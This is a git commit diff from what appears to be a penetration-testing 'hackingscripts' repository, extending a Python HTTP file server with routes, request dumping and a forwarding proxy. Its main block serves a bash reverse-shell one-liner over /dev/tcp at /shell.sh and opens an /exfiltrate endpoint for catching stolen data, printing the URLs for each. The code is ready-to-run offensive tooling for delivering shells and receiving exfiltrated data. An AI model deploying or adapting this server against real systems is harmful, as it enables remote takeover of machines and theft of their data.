Browse Source

python webserver routes

Roman Hergenreder 3 years ago
parent
commit
2338077bd6
2 changed files with 60 additions and 26 deletions
  1. 60 26
      fileserver.py
  2. 0 0
      linux-exploit-suggester.sh

+ 60 - 26
fileserver.py

@@ -3,6 +3,7 @@
 from hackingscripts import util
 from http.server import BaseHTTPRequestHandler, HTTPServer
 import threading
+import requests
 import sys
 import os
 import ssl
@@ -15,13 +16,26 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
     def do_POST(self):
         self.do_GET()
 
+    def onForward(self, target):
+        queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]
+        if queryStr:
+            target += "?" if "?" not in target else "&"
+            target += queryStr
+
+        method = self.command
+        res = requests.request(method, target)
+        return res.content, res.status_code
+
     def do_GET(self):
-        path = self.path if "?" not in self.path else self.path[0:self.path.find("?")]
-        if path in self.server.files:
-            data = self.server.files[path]
-            self.send_response(200)
+
+        path = self.server.cleanPath(self.path)
+        if path in self.server.routes:
+            data, code = self.server.routes[path](self)
+            self.send_response(code)
             self.end_headers()
-            self.wfile.write(data)
+
+            if data:
+                self.wfile.write(data)
         else:
             self.send_response(404)
             self.end_headers()
@@ -42,34 +56,40 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
 
     def log_message(self, format, *args):
         if self.server.logRequests:
-            # BaseHTTPRequestHandler.log_message(format, *args)
             super().log_message(format, *args)
 
 class HttpFileServer(HTTPServer):
     def __init__(self, addr, port):
         super().__init__((addr, port), FileServerRequestHandler)
         self.logRequests = False
+        self.routes = { }
         self.dumpRequests = []
-        self.files = { }
 
-    def addFile(self, name, data):
-        if isinstance(data, str):
-            data = data.encode("UTF-8")
-        if not name.startswith("/"):
-            name = "/" + name
-        self.files[name.strip()] = data
+    def cleanPath(self, path):
+
+        if "?" in path:
+            path = path[0:path.find("?")]
+
+        if not path.startswith("/"):
+            path = "/" + path
+
+        return path.strip()
 
     def addFile(self, name, data):
         if isinstance(data, str):
             data = data.encode("UTF-8")
-        if not name.startswith("/"):
-            name = "/" + name
-        self.files[name.strip()] = data
+
+        # return 200 - OK and data
+        self.addRoute(name, lambda req: (data, 200))
 
     def dumpRequest(self, name):
-        if not name.startswith("/"):
-            name = "/" + name
-        self.dumpRequests.append(name)
+        self.dumpRequests.append(self.cleanPath(name))
+
+    def addRoute(self, path, func):
+        self.routes[self.cleanPath(path)] = func
+
+    def forwardRequest(self, path, target):
+        self.addRoute(path, lambda req: req.onForward(target))
 
     def enableLogging(self):
         self.logRequests = True
@@ -99,13 +119,27 @@ class HttpFileServer(HTTPServer):
         t.start()
         return t
 
-# EXAMPLE
+    def start(self):
+        return self.serve_forever()
+
 if __name__ == "__main__":
-    listenPort = 4444 if len(sys.argv) < 2 else int(sys.argv[1])
-    ipAddress = util.getAddress()
+    if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy"]:
+        print("Usage: %s [shell,dump,proxy]" % sys.argv[0])
+        exit(1)
 
-    rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
     fileServer = HttpFileServer("0.0.0.0", 80)
-    fileServer.addFile("shell.sh", rev_shell)
-    fileServer.startBackground()
-    print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
+    ipAddress = util.getAddress()
+
+    if sys.argv[1] == "shell":
+        listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
+        rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
+        fileServer.addFile("shell.sh", rev_shell)
+        print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
+    elif sys.argv[1] == "dump":
+        fileServer.dumpRequest("/exfiltrate")
+        print("Exfiltrate data using: http://%s/exfiltrate" % ipAddress)
+    elif sys.argv[1] == "proxy":
+        fileServer.forwardRequest("/proxy", "https://google.com")
+        print("Exfiltrate data using: http://%s/proxy" % ipAddress)
+
+    fileServer.start()

+ 0 - 0
linux-exploit-suggester.sh